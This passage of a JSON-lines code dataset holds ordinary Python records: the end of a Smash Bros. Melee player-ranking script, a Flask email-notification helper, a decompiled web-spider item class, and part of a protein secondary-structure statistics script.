Hungrybox, Hax]\r\n n0ne2R = [\"l\", \"w\", \"l\", \"w\", \"w\", \"l\", \"l\"]\r\n n0ne.lvl_calculator(Genesis7, 7, n0ne1O, n0ne1R)\r\n n0ne.lvl_calculator(SmashSummit9, 9, n0ne2O, n0ne2R)\r\n\r\n # Trif\r\n Trif1O = [Plus100, Frenzy, Plus100]\r\n Trif1R = [\"l\", \"w\", \"l\"]\r\n Trif2O = [Forrest, Mango, Swedish_Delight]\r\n Trif2R = [\"w\", \"l\", \"l\"]\r\n Trif3O = [Ginger, S2J, Westballz, SFAT, Captain_Faceroll, S2J]\r\n Trif3R = [\"w\", \"l\", \"w\", \"w\", \"w\", \"l\"]\r\n Trif4O = [iBDW, ARMY, Albert, Kalamazhu, Squid, SFAT, ARMY]\r\n Trif4R = [\"l\", \"l\", \"w\", \"w\", \"w\", \"w\", \"l\"]\r\n Trif.lvl_calculator(Valhalla3, 4, Trif1O, Trif1R)\r\n Trif.lvl_calculator(Genesis7, 17, Trif2O, Trif2R)\r\n Trif.lvl_calculator(SavingMrLombardi2, 7, Trif3O, Trif3R)\r\n\r\n # Captain Faceroll\r\n CF1O = [Bladewise, Swedish_Delight, Hungrybox, Wizzrobe, iBDW, Fiction]\r\n CF1R = [\"w\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n CF2O = [SFAT, MikeHaze, Professor_Pro, Kodorin, Nut, Prince_Abu, ARMY]\r\n CF2R = [\"l\", \"l\", \"l\", \"w\", \"w\", \"w\", \"l\"]\r\n Captain_Faceroll.lvl_calculator(Genesis7, 9, CF1O, CF1R)\r\n Captain_Faceroll.lvl_calculator(SavingMrLombardi2, 9, CF2O, CF2R)\r\n\r\n # Swedish Delight\r\n SD1O = [Kevin_Maples, Captain_Faceroll, La_Luna, Trif, Mew2King, Shroomed]\r\n SD1R = [\"w\", \"l\", \"w\", \"w\", \"w\", \"l\"]\r\n Swedish_Delight.lvl_calculator(Genesis7, 9, SD1O, SD1R)\r\n\r\n # Hax$\r\n Hax1O = [Aura, n0ne, Leffen, SFAT, Westballz, PewPewU, Shroomed, Leffen, Hungrybox]\r\n Hax1R = [\"w\", \"w\", \"l\", \"w\", \"w\", \"w\", \"w\", \"w\", \"l\"]\r\n Hax2O = [Hungrybox, Plup, Fiction, Mango, Pricent, Spark, n0ne, iBDW]\r\n Hax2R = [\"l\", \"w\", \"l\", \"l\", \"w\", \"w\", \"w\", \"l\"]\r\n Hax.lvl_calculator(Genesis7, 4, Hax1O, Hax1R)\r\n Hax.lvl_calculator(SmashSummit9, 7, Hax2O, Hax2R)\r\n\r\n # Lucky\r\n Lucky1O = [Ice, Plus100]\r\n Lucky1R = [\"l\", \"l\"]\r\n Lucky2O = [Fiction, Spark, Bimbo, Plus100, iBDW, MikeHaze, S2J]\r\n Lucky2R = [\"w\", \"w\", \"w\", \"l\", \"l\", \"w\", \"l\"]\r\n Lucky3O = [Squid, Westballz, Plus100]\r\n Lucky3R = [\"w\", \"l\", \"l\"]\r\n Lucky.lvl_calculator(Genesis7, 65, Lucky1O, Lucky1R)\r\n Lucky.lvl_calculator(SavingMrLombardi2, 7, Lucky2O, 
Lucky2R)\r\n Lucky.lvl_calculator(DreamhackAnaheim, 9, Lucky3O, Lucky3R)\r\n\r\n # Ginger\r\n Ginger1O = [Kalvar, SFAT, Shroomed, n0ne]\r\n Ginger1R = [\"w\", \"w\", \"l\", \"l\"]\r\n Ginger2O = [S2J, Westballz, Ice, Prince_Abu, Franz, SFAT, Fiction, S2J]\r\n Ginger2R = [\"l\", \"l\", \"w\", \"w\", \"w\", \"w\", \"l\", \"l\"]\r\n Ginger3O = [Prince_Abu, Magi, Magi]\r\n Ginger3R = [\"w\", \"w\", \"w\"]\r\n Ginger.lvl_calculator(Genesis7, 17, Ginger1O, Ginger1R)\r\n Ginger.lvl_calculator(SavingMrLombardi2, 5, Ginger2O, Ginger2R)\r\n Ginger.lvl_calculator(HTL5, 1, Ginger3O, Ginger3R)\r\n\r\n # Spark\r\n Spark1O = [Plus100, Free_Palestine, Wizzrobe]\r\n Spark1R = [\"l\", \"w\", \"l\"]\r\n Spark2O = [Fiction, Lucky, Bimbo, Plus100]\r\n Spark2R = [\"l\", \"l\", \"w\", \"l\"]\r\n Spark3O = [Leffen, Ryobeat, Axe, n0ne, iBDW, Hax]\r\n Spark3R = [\"l\", \"w\", \"l\", \"l\", \"l\", \"l\"]\r\n Spark.lvl_calculator(Genesis7, 25, Spark1O, Spark1R)\r\n Spark.lvl_calculator(SavingMrLombardi2, 17, Spark2O, Spark2R)\r\n Spark.lvl_calculator(SmashSummit9, 13, Spark3O, Spark3R)\r\n\r\n # ChuDat\r\n ChuDat1O = [Fiction, TheSWOOPER]\r\n ChuDat1R = [\"l\", \"l\"]\r\n ChuDat.lvl_calculator(Genesis7, 33, ChuDat1O, ChuDat1R)\r\n\r\n # PewPewU\r\n PPU1O = [HugS, Plup, iBDW, Hungrybox, Hax]\r\n PPU1R = [\"w\", \"w\", \"w\", \"l\", \"l\"]\r\n PewPewU.lvl_calculator(Genesis7, 9, PPU1O, PPU1R)\r\n\r\n # lloD\r\n # NONE\r\n\r\n # ARMY\r\n ARMY1O = [Drephen, iBDW, Aura, Plup, Mew2King]\r\n ARMY1R = [\"w\", \"l\", \"w\", \"w\", \"l\"]\r\n ARMY2O = [iBDW, Trif, Albert, Kalamazhu, Squid, Fiction, Captain_Faceroll, Trif, Professor_Pro]\r\n ARMY2R = [\"w\", \"w\", \"w\", \"l\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n ARMY3O = [Nut, S2J, Westballz]\r\n ARMY3R = [\"w\", \"l\", \"l\"]\r\n ARMY.lvl_calculator(Genesis7, 17, ARMY1O, ARMY1R)\r\n ARMY.lvl_calculator(SavingMrLombardi2, 5, ARMY2O, ARMY2R)\r\n ARMY.lvl_calculator(DreamhackAnaheim, 4, ARMY3O, ARMY3R)\r\n\r\n # AbsentPage\r\n # NONE\r\n\r\n # Bananas\r\n # NONE\r\n\r\n # KJH\r\n # NONE\r\n\r\n # Shroomed\r\n Shroomed1O = [Rishi, Panda, Ginger, Zain, Swedish_Delight, Hax]\r\n Shroomed1R = [\"w\", \"w\", \"w\", \"l\", \"w\", \"l\"]\r\n Shroomed2O = [Mango, Magi, Plup, Pricent, aMSa]\r\n Shroomed2R = [\"l\", \"w\", \"l\", \"l\", \"l\"]\r\n Shroomed.lvl_calculator(Genesis7, 7, Shroomed1O, Shroomed1R)\r\n Shroomed.lvl_calculator(SmashSummit9, 17, Shroomed2O, Shroomed2R)\r\n\r\n # Westballz\r\n Westballz1O = [Ryobeat, Fiction, Hax]\r\n Westballz1R = [\"w\", \"l\", \"l\"]\r\n Westballz2O = [S2J, Ginger, Ice, Prince_Abu, Franz, MikeHaze]\r\n Westballz2R = [\"l\", \"w\", \"l\", \"l\", \"w\", \"l\"]\r\n Westballz3O = [Schythed, Lucky, Fiction, Tai, ARMY, S2J]\r\n Westballz3R = [\"w\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Westballz.lvl_calculator(Genesis7, 13, Westballz1O, Westballz1R)\r\n Westballz.lvl_calculator(SavingMrLombardi2, 13, Westballz1O, Westballz1R)\r\n Westballz.lvl_calculator(DreamhackAnaheim, 3, Westballz3O, Westballz3R)\r\n\r\n # Medz\r\n Medz1O = [JakenShaken, Wizzrobe]\r\n Medz1R = [\"l\", \"l\"]\r\n Medz.lvl_calculator(Genesis7, 49, Medz1O, Medz1R)\r\n\r\n # Professor_Pro\r\n Prof1O = [Leffen, Leffen]\r\n Prof1R = [\"l\", \"l\"]\r\n Prof2O = [billybopeep, Mew2King, Kodorin, Ice]\r\n Prof2R = [\"w\", \"l\", \"w\", \"l\"]\r\n Prof3O = [SFAT, Captain_Faceroll, MikeHaze, Kodorin, Nut, S2J, iBDW, ARMY, S2J]\r\n Prof3R = [\"l\", \"w\", \"w\", \"w\", \"w\", \"w\", \"l\", \"w\", \"l\"]\r\n Professor_Pro.lvl_calculator(Valhalla3, 2, Prof1O, Prof1R)\r\n 
Professor_Pro.lvl_calculator(Genesis7, 25, Prof2O, Prof2R)\r\n Professor_Pro.lvl_calculator(SavingMrLombardi2, 4, Prof3O, Prof3R)\r\n\r\n # 2Saint\r\n # NONE\r\n\r\n # Gahtzu\r\n Gahtzu1O = [Plus100, Plus100]\r\n Gahtzu1R = [\"l\", \"l\"]\r\n Gahtzu.lvl_calculator(Genesis7, 49, Gahtzu1O, Gahtzu1R)\r\n\r\n # Albert\r\n Albert1O = [iBDW, Trif, ARMY, Kalamazhu, Squid]\r\n Albert1R = [\"l\", \"l\", \"l\", \"l\", \"w\"]\r\n Albert2O = [Plus100, Tai]\r\n Albert2R = [\"l\", \"l\"]\r\n Albert.lvl_calculator(SavingMrLombardi2, 17, Albert1O, Albert1R)\r\n Albert.lvl_calculator(DreamhackAnaheim, 9, Albert2O, Albert2R)\r\n\r\n # Spud\r\n Spud1O = [FatGoku, Hungrybox, La_Luna]\r\n Spud1R = [\"w\", \"l\", \"l\"]\r\n Spud.lvl_calculator(Genesis7, 33, Spud1O, Spud1R)\r\n\r\n # FatGoku\r\n FatGoku1O = [Spud, Plus100]\r\n FatGoku1R = [\"l\", \"l\"]\r\n FatGoku2O = [TheSWOOPER, Magi, Drephen, Prince_Abu]\r\n FatGoku2R = [\"w\", \"l\", \"w\", \"l\"]\r\n FatGoku.lvl_calculator(Genesis7, 65, FatGoku1O, FatGoku1R)\r\n FatGoku.lvl_calculator(HTL5, 4, FatGoku1O, FatGoku1R)\r\n\r\n # Rishi\r\n Rishi1O = [Shroomed, Ice]\r\n Rishi1R = [\"l\", \"l\"]\r\n Rishi.lvl_calculator(Genesis7, 49, Rishi1O, Rishi1R)\r\n\r\n # Bimbo\r\n Bimbo1O = [Plus100, TheSWOOPER]\r\n Bimbo1R = [\"l\", \"l\"]\r\n Bimbo2O = [Fiction, Spark, Lucky, Plus100, Plus100]\r\n Bimbo2R = [\"l\", \"l\", \"l\", \"l\", \"l\"]\r\n Bimbo.lvl_calculator(Genesis7, 97, Bimbo1O, Bimbo1R)\r\n Bimbo.lvl_calculator(SavingMrLombardi2, 25, Bimbo2O, Bimbo2R)\r\n\r\n # Setchi\r\n # NONE\r\n\r\n # Magi\r\n Magi1O = [Plus100, Plus100]\r\n Magi1R = [\"l\", \"l\"]\r\n Magi2O = [aMSa, Shroomed, Plup, Pricent, Fiction, Wizzrobe]\r\n Magi2R = [\"l\", \"l\", \"l\", \"w\", \"l\", \"l\"]\r\n Magi3O = [TheRealThing, FatGoku, Ginger, Prince_Abu, Ginger]\r\n Magi3R = [\"w\", \"w\", \"l\", \"w\", \"l\"]\r\n Magi.lvl_calculator(Genesis7, 129, Magi1O, Magi1R)\r\n Magi.lvl_calculator(SmashSummit9, 13, Magi2O, Magi2R)\r\n Magi.lvl_calculator(HTL5, 2, Magi3O, Magi3R)\r\n\r\n # Morsecode762\r\n # NONE\r\n\r\n # JakenShaken\r\n JS1O = [Medz, Zain, Plus100]\r\n JS1R = [\"w\", \"l\", \"l\"]\r\n JakenShaken.lvl_calculator(Genesis7, 33, JS1O, JS1R)\r\n\r\n # HugS\r\n Hugs1O = [PewPewU, Prince_Abu]\r\n Hugs1R = [\"l\", \"l\"]\r\n Hugs2O = [Plus100, Squid]\r\n Hugs2R = [\"l\", \"l\"]\r\n HugS.lvl_calculator(Genesis7, 65, Hugs1O, Hugs1R)\r\n HugS.lvl_calculator(SavingMrLombardi2, 33, Hugs2O, Hugs2R)\r\n\r\n # Stango\r\n # NONE\r\n\r\n # Zamu\r\n Zamu1O = [Plus100, Wizzrobe]\r\n Zamu1R = [\"l\", \"l\"]\r\n Zamu.lvl_calculator(Genesis7, 65, Zamu1O, Zamu1R)\r\n\r\n # Drephen\r\n Drephen1O = [ARMY, Plus100]\r\n Drephen1R = [\"l\", \"l\"]\r\n Drephen2O = [Prince_Abu, FatGoku]\r\n Drephen2R = [\"l\", \"l\"]\r\n Drephen.lvl_calculator(Genesis7, 65, Drephen1O, Drephen1R)\r\n Drephen.lvl_calculator(HTL5, 5, Drephen2O, Drephen2R)\r\n\r\n # Michael\r\n # NONE\r\n\r\n # Ice\r\n Ice1O = [Lucky, aMSa, Rishi, Professor_Pro, iBDW]\r\n Ice1R = [\"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Ice2O = [Westballz, Franz, S2J, Ginger, Prince_Abu]\r\n Ice2R = [\"w\", \"w\", \"l\", \"l\", \"l\"]\r\n Ice.lvl_calculator(Genesis7, 17, Ice1O, Ice1R)\r\n Ice.lvl_calculator(SavingMrLombardi2, 17, Ice2O, Ice2R)\r\n\r\n # billybopeep\r\n BBP1O = [Professor_Pro, BBB, SFAT]\r\n BBP1R = [\"l\", \"w\", \"l\"]\r\n billybopeep.lvl_calculator(Genesis7, 33, BBP1O, BBP1R)\r\n\r\n # La Luna\r\n LaLuna1O = [Plus100, Joyboy, Spud, Swedish_Delight]\r\n LaLuna1R = [\"l\", \"w\", \"w\", \"l\"]\r\n La_Luna.lvl_calculator(Genesis7, 25, LaLuna1O, 
LaLuna1R)\r\n\r\n # Colbol\r\n # NONE\r\n\r\n # OverTriforce\r\n Over1O = [Frenzy, Plus100]\r\n Over1R = [\"l\", \"l\"]\r\n OverTriforce.lvl_calculator(Valhalla3, 5, Over1O, Over1R)\r\n\r\n # Slox\r\n # NONE\r\n\r\n # Kalamazhu\r\n Kzhu1O = [Plus100, Plus100]\r\n Kzhu1R = [\"l\", \"l\"]\r\n Kzhu2O = [iBDW, Trif, ARMY, Albert, Squid, S2J]\r\n Kzhu2R = [\"l\", \"w\", \"w\", \"w\", \"w\", \"l\"]\r\n Kalamazhu.lvl_calculator(Genesis7, 97, Kzhu1O, Kzhu1R)\r\n Kalamazhu.lvl_calculator(SavingMrLombardi2, 9, Kzhu2O, Kzhu2R)\r\n\r\n # Nickemwit\r\n # NONE\r\n\r\n # Jerry\r\n # NONE\r\n\r\n # Aura\r\n Aura1O = [Hax, Tai, ARMY]\r\n Aura1R = [\"l\", \"w\", \"l\"]\r\n Aura.lvl_calculator(Genesis7, 33, Aura1O, Aura1R)\r\n\r\n # Nut\r\n Nut1O = [Plus100, Moky]\r\n Nut1R = [\"l\", \"l\"]\r\n Nut2O = [Prince_Abu, SFAT, Captain_Faceroll, MikeHaze, Professor_Pro, Kodorin]\r\n Nut2R = [\"l\", \"l\", \"l\", \"l\", \"l\", \"l\"]\r\n Nut3O = [Kurv, ARMY, Plus100]\r\n Nut3R = [\"w\", \"l\", \"l\"]\r\n Nut.lvl_calculator(Genesis7, 65, Nut1O, Nut1R)\r\n Nut.lvl_calculator(SavingMrLombardi2, 25, Nut2O, Nut2R)\r\n Nut.lvl_calculator(DreamhackAnaheim, 17, Nut3O, Nut3R)\r\n\r\n # Kalvar\r\n Kalvar1O = [Ginger, Plus100]\r\n Kalvar1R = [\"l\", \"l\"]\r\n Kalvar.lvl_calculator(Genesis7, 65, Kalvar1O, Kalvar1R)\r\n\r\n # Polish\r\n # NONE\r\n\r\n # Kevin Maples\r\n KevinMaples1O = [Swedish_Delight, Moky]\r\n KevinMaples1R = [\"l\", \"l\"]\r\n Kevin_Maples.lvl_calculator(Genesis7, 49, KevinMaples1O, KevinMaples1R)\r\n\r\n # Bladewise\r\n Bladewise1O = [Captain_Faceroll, Plus100]\r\n Bladewise1R = [\"l\", \"l\"]\r\n Bladewise.lvl_calculator(Genesis7, 65, Bladewise1O, Bladewise1R)\r\n\r\n # Tai\r\n Tai1O = [SFAT, Aura]\r\n Tai1R = [\"l\", \"l\"]\r\n Tai2O = [MikeHaze, S2J, Albert, Schythed, Westballz]\r\n Tai2R = [\"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Tai.lvl_calculator(Genesis7, 49, Tai1O, Tai1R)\r\n Tai.lvl_calculator(DreamhackAnaheim, 5, Tai2O, Tai2R)\r\n\r\n # Squid\r\n Squid1O = [Franz, HugS, iBDW, Trif, ARMY, Albert, Kalamazhu]\r\n Squid1R = [\"l\", \"w\", \"l\", \"l\", \"l\", \"l\", \"l\"]\r\n Squid2O = [Lucky, Schythed]\r\n Squid2R = [\"l\", \"l\"]\r\n Squid.lvl_calculator(SavingMrLombardi2, 25, Squid1O, Squid1R)\r\n Squid.lvl_calculator(DreamhackAnaheim, 13, Squid2O, Squid2R)\r\n\r\n # Forrest\r\n Forrest1O = [HTwa, Moky, Trif, Wizzrobe]\r\n Forrest1R = [\"w\", \"w\", \"l\", \"l\"]\r\n Forrest.lvl_calculator(Genesis7, 33, Forrest1O, Forrest1R)\r\n\r\n # Joyboy\r\n Joyboy1O = [S2J, La_Luna]\r\n Joyboy1R = [\"l\", \"l\"]\r\n Joyboy.lvl_calculator(Genesis7, 65, Joyboy1O, Joyboy1R)\r\n\r\n # Kodorin\r\n Kodorin1O = [n0ne, Professor_Pro]\r\n Kodorin1R = [\"l\", \"l\"]\r\n Kodorin2O = [Franz, SFAT, Captain_Faceroll, MikeHaze, Professor_Pro, Nut]\r\n Kodorin2R = [\"w\", \"l\", \"l\", \"w\", \"l\", \"w\"]\r\n Kodorin.lvl_calculator(Genesis7, 33, Kodorin1O, Kodorin1R)\r\n Kodorin.lvl_calculator(SavingMrLombardi2, 17, Kodorin2O, Kodorin2R)\r\n\r\n # Ryan Ford\r\n # NONE\r\n\r\n # Free Palestine\r\n FP1O = [Fiction, Spark]\r\n FP1R = [\"l\", \"l\"]\r\n Free_Palestine.lvl_calculator(Genesis7, 49, FP1O, FP1R)\r\n\r\n # Ryobeat\r\n Ryobeat1O = [Umarth, Wizzrobe, Westballz, Moky, TheSWOOPER, S2J]\r\n Ryobeat1R = [\"w\", \"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Ryobeat2O = [Axe, Spark, BBB, Wizzrobe, n0ne]\r\n Ryobeat2R = [\"l\", \"l\", \"l\", \"l\", \"l\"]\r\n Ryobeat.lvl_calculator(Genesis7, 17, Ryobeat1O, Ryobeat1R)\r\n Ryobeat.lvl_calculator(SmashSummit9, 17, Ryobeat2O, Ryobeat2R)\r\n\r\n # Ka-Master\r\n # NONE\r\n\r\n # Kurv\r\n 
Kurv1O = [Plus100, Plus100]\r\n Kurv1R = [\"l\", \"l\"]\r\n Kurv2O = [Plus100, Plus100]\r\n Kurv2R = [\"l\", \"l\"]\r\n Kurv3O = [Plus100, Nut]\r\n Kurv3R = [\"l\", \"l\"]\r\n Kurv.lvl_calculator(Genesis7, 97, Kurv1O, Kurv1R)\r\n Kurv.lvl_calculator(SavingMrLombardi2, 33, Kurv2O, Kurv2R)\r\n Kurv.lvl_calculator(DreamhackAnaheim, 33, Kurv3O, Kurv3R)\r\n\r\n # Frenzy\r\n Frenzy1O = [OverTriforce, Leffen, Trif]\r\n Frenzy1R = [\"w\", \"l\", \"l\"]\r\n Frenzy.lvl_calculator(Valhalla3, 5, Frenzy1O, Frenzy1R)\r\n\r\n # MoG\r\n # NONE\r\n\r\n # Boyd\r\n Boyd1O = [Zain, Plus100]\r\n Boyd1R = [\"l\", \"l\"]\r\n Boyd.lvl_calculator(Genesis7, 65, Boyd1O, Boyd1R)\r\n\r\n # Cool Lime\r\n # NONE\r\n\r\n # Bobby Big Ballz\r\n BBB1O = [iBDW, billybopeep]\r\n BBB1R = [\"l\", \"l\"]\r\n BBB2O = [Wizzrobe, iBDW, Ryobeat, Axe, Leffen, aMSa]\r\n BBB2R = [\"l\", \"l\", \"w\", \"l\", \"l\", \"l\"]\r\n BBB.lvl_calculator(Genesis7, 49, BBB1O, BBB1R)\r\n BBB.lvl_calculator(SmashSummit9, 13, BBB2O, BBB2R)\r\n\r\n # Nintendude\r\n Nintendude1O = [Panda, Plus100]\r\n Nintendude1R = [\"l\", \"l\"]\r\n Nintendude.lvl_calculator(Genesis7, 97, Nintendude1O, Nintendude1R)\r\n\r\n # Franz\r\n Franz1O = [Plus100, Plus100]\r\n Franz1R = [\"l\", \"l\"]\r\n Franz2O = [Squid, Kodorin, S2J, Ginger, Westballz, Ice, Prince_Abu]\r\n Franz2R = [\"w\", \"l\", \"l\", \"l\", \"l\", \"l\", \"l\"]\r\n Franz.lvl_calculator(Genesis7, 129, Franz1O, Franz1R)\r\n Franz.lvl_calculator(SavingMrLombardi2, 25, Franz2O, Franz2R)\r\n\r\n # Nicki\r\n Nicki1O = [Mango, TheSWOOPER]\r\n Nicki1R = [\"l\", \"l\"]\r\n Nicki.lvl_calculator(Genesis7, 65, Nicki1O, Nicki1R)\r\n\r\n # Lint\r\n # NONE\r\n\r\n # King Momo\r\n # NONE\r\n\r\n # TheRealThing\r\n TRT1O = [Schythed, Plus100]\r\n TRT1R = [\"l\", \"l\"]\r\n TRT2O = [Magi, Prince_Abu]\r\n TRT2R = [\"l\", \"l\"]\r\n TheRealThing.lvl_calculator(Genesis7, 65, TRT1O, TRT1R)\r\n TheRealThing.lvl_calculator(HTL5, 5, TRT2O, TRT2R)\r\n\r\n # Umarth\r\n Umarth1O = [Ryobeat, Plus100]\r\n Umarth1R = [\"l\", \"l\"]\r\n Umarth.lvl_calculator(Genesis7, 65, Umarth1O, Umarth1R)\r\n\r\n # Zeo\r\n Zeo1O = [Plus100, Plus100]\r\n Zeo1R = [\"l\", \"l\"]\r\n Zeo.lvl_calculator(SavingMrLombardi2, 25, Zeo1O, Zeo1R)\r\n\r\n # Pricent\r\n Pricent1O = [Fiction, aMSa, Shroomed, Magi, Hax, iBDW]\r\n Pricent1R = [\"l\", \"l\", \"w\", \"l\", \"l\", \"l\"]\r\n Pricent.lvl_calculator(SmashSummit9, 13, Pricent1O, Pricent1R)\r\n\r\n # Prince Abu\r\n PA1O = [Rocky, HugS, MikeHaze]\r\n PA1R = [\"l\", \"w\", \"l\"]\r\n PA2O = [Nut, S2J, Ginger, Westballz, Ice, Franz, Captain_Faceroll]\r\n PA2R = [\"w\", \"l\", \"l\", \"w\", \"w\", \"w\", \"l\"]\r\n PA3O = [Drephen, Ginger, TheRealThing, FatGoku, Magi]\r\n PA3R = [\"w\", \"l\", \"w\", \"w\", \"l\"]\r\n Prince_Abu.lvl_calculator(Genesis7, 33, PA1O, PA1R)\r\n Prince_Abu.lvl_calculator(SavingMrLombardi2, 13, PA2O, PA2R)\r\n Prince_Abu.lvl_calculator(HTL5, 3, PA3O, PA3R)\r\n\r\n # Amsah\r\n # NONE\r\n\r\n # Rocky\r\n Rocky1O = [Prince_Abu, Plup, Plus100]\r\n Rocky1R = [\"w\", \"l\", \"l\"]\r\n Rocky.lvl_calculator(Genesis7, 49, Rocky1O, Rocky1R)\r\n\r\n # Sharkz\r\n # NONE\r\n\r\n # HTwa\r\n HTwa1O = [Forrest, Plus100]\r\n HTwa1R = [\"l\", \"l\"]\r\n HTwa.lvl_calculator(Genesis7, 129, HTwa1O, HTwa1R)\r\n\r\n # Kage\r\n # NONE\r\n\r\n # Schythed\r\n Schythed1O = [TheRealThing, Leffen, Plus100]\r\n Schythed1R = [\"w\", \"l\", \"l\"]\r\n Schythed.lvl_calculator(Genesis7, 65, Schythed1O, Schythed1R)\r\n\r\n # Panda\r\n Panda1O = [Nintendude, Axe, Shroomed, SFAT]\r\n Panda1R = [\"w\", \"w\", \"l\", 
\"l\"]\r\n Panda.lvl_calculator(Genesis7, 25, Panda1O, Panda1R)\r\n\r\n # Soonsay\r\n Soonsay1O = [Mew2King, Plus100]\r\n Soonsay1R = [\"l\", \"l\"]\r\n Soonsay.lvl_calculator(Genesis7, 65, Soonsay1O, Soonsay1R)\r\n\r\n # TheSWOOPER\r\n TS1O = [Plus100, Bimbo, Nicki, ChuDat, Ryobeat]\r\n TS1R = [\"l\", \"w\", \"w\", \"w\", \"l\"]\r\n TS2O = [FatGoku, Plus100]\r\n TS2R = [\"l\", \"l\"]\r\n TheSWOOPER.lvl_calculator(Genesis7, 25, TS1O, TS1R)\r\n TheSWOOPER.lvl_calculator(HTL5, 9, TS2O, TS2R)\r\n\r\n # Snowy\r\n # NONE\r\n\r\n # TOP 100 MPGR PLAYERS DONE\r\n\r\n # Main part\r\n printSortedPlayers(player_list)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"ear-m-static.py","file_name":"ear-m-static.py","file_ext":"py","file_size_in_byte":32184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"307015580","text":"import os\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\nfrom flask import current_app\nfrom jinja2 import Environment, FileSystemLoader\n\nenv = Environment(loader=FileSystemLoader('%s/templates/' % os.path.dirname(__file__)))\n\ndef send(*args):\n to_email, intervention_id, what_happens_label = args\n from_email = current_app.config[\"FROM_EMAIL\"]\n\n template = env.get_template('email.html')\n intervention_url = f\"{current_app.config['ENKI_FRONT_BASE_URI']}/detail-intervention/{intervention_id}\"\n body_content = template.render(\n intervention_url=intervention_url,\n what_happens_label=what_happens_label\n )\n message = MIMEMultipart()\n message.attach(MIMEText(body_content, \"html\"))\n message['Subject'] = 'Une nouvelle intervention a commencé sur votre communne'\n message['From'] = from_email\n message['To'] = to_email\n msg_body = message.as_string()\n\n s = smtplib.SMTP('mailhog:1025')\n s.sendmail(from_email, to_email, msg_body)\n s.quit()\n","sub_path":"backend/src/adapters/notifications/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"4578097","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\AsyncSpider\\implements\\item.py\n# Compiled at: 2018-03-10 15:31:10\n# Size of source mod 2**32: 333 bytes\nfrom ..core import Item, Field, Spider\n__all__ = ['ImageItem']\n\nclass ImageItem(Item):\n url = Field()\n content = Field()\n\n @classmethod\n async def load(cls, spider: Spider, img_url, **kwargs):\n resp = await (spider.fetch)('get', img_url, **kwargs)\n return cls(url=(resp.url), content=(resp.content))","sub_path":"pycfiles/AsyncSpider-0.4.2-py3.6/item.cpython-36.py","file_name":"item.cpython-36.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"218632404","text":"import numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nimport pandas as pd\nimport os\n\n#\n# Analyzes the predicted data, smaller version of getStatistics.py.\n# Saves the statistics in npy files in the 'data analysis/predicted' 
folder\n#\n\nproteins_path='../mheinzinger/contact_prediction_v2/targets/dssp'\nseq_path='../mheinzinger/contact_prediction_v2/sequences'\nanna_path='dataset_preprocessed'\ntargets_path='/home/mheinzinger/contact_prediction_v2/targets'\nstatistics_dir='data analysis/predicted'\n\nattributes={}\n\ndef readResidues(path):\n if(os.path.isfile(path)):\n f = open(path, 'r')\n residues_input = f.read().splitlines()\n f.close()\n residues=''\n for i in range(len(residues_input)):\n if(i>0):\n if(residues_input[i][0]=='>'):\n break\n residues += residues_input[i]\n return residues\n else:\n print('no residue')\n\ndef readStructures3(protein):\n path = proteins_path + '/'+protein.lower() + '/' + protein.lower() + '.3.consensus.dssp'\n if(os.path.isfile(path)):\n f = open(path, 'r')\n structures_input = f.read().splitlines()\n f.close()\n structures=''\n for i in range(len(structures_input)):\n if(i>0):\n structures += structures_input[i]\n return structures\n else:\n print('no 3 file of', protein)\n\ndef readStructures8(protein):\n path = proteins_path + '/'+ protein.lower() + '/' + protein.lower() + '.8.consensus.dssp'\n if(os.path.isfile(path)):\n f = open(path, 'r')\n structures_input = f.read().splitlines()\n f.close()\n structures = ''\n for i in range(len(structures_input)):\n if (i > 0):\n structures += structures_input[i]\n return structures\n else:\n print('no 8 file of ', protein)\n\ndef getInput(classification_mode): #proteins in a folder named root+proteins/\n dict={}\n lengths=[]\n i=0\n for prot in os.listdir(anna_path):\n i+=1\n res=readResidues(seq_path+'/'+prot.upper()+'.fasta.txt')\n lengths.append(len(res))\n if(classification_mode==3):\n str=readStructures3(prot.lower())\n elif(classification_mode==8):\n str=readStructures8(prot.lower())\n else:\n raise ValueError('[ERROR] Either 3 or 8 classes')\n\n solvAcc=np.memmap(targets_path + '/dssp/' + prot.lower() + '/' + prot.lower() + '.rel_asa.memmap',\n dtype=np.float32, mode='r', shape=len(res))\n solvAcc=np.nan_to_num(solvAcc)\n\n flex=np.memmap(targets_path + '/bdb_bvals/' + prot.lower() + '.bdb.memmap', dtype=np.float32, mode='r', shape=len(res))\n flex=np.nan_to_num(flex)\n if(str!=None and res!=None and solvAcc!=None and flex!=None):\n tmp = {prot: (res, str, solvAcc, flex)}\n dict.update(tmp)\n return dict, lengths\n\ndef countStructures3(dict, f):\n c = 0\n h = 0\n e = 0\n xy = 0\n for sample in dict.keys():\n seq=dict[sample][0].cpu().numpy()[0]\n original_len=dict[sample][1].cpu().numpy()\n mask=dict[sample][2].cpu().numpy()[0]\n mask = mask[:original_len]\n xy_idx = np.where(mask == 0.0)\n seq[xy_idx] = 3\n sequence=''\n for i in seq:\n sequence+=str(i)\n sequence=sequence[:original_len]\n sequence=sequence.replace('0','C')\n sequence = sequence.replace('1', 'H')\n sequence = sequence.replace('2', 'E')\n sequence = sequence.replace('3', 'X')\n\n for i in range(len(sequence)):\n if(sequence[i]=='C'):\n c+=1\n elif(sequence[i]=='H'):\n h+=1\n elif(sequence[i]=='E'):\n e+=1\n elif(sequence[i]=='X' or sequence[i]=='Y'):\n xy+=1\n else:\n raise ValueError('Unknown structure', sequence[i])\n\n f.write('\\n')\n f.write('### 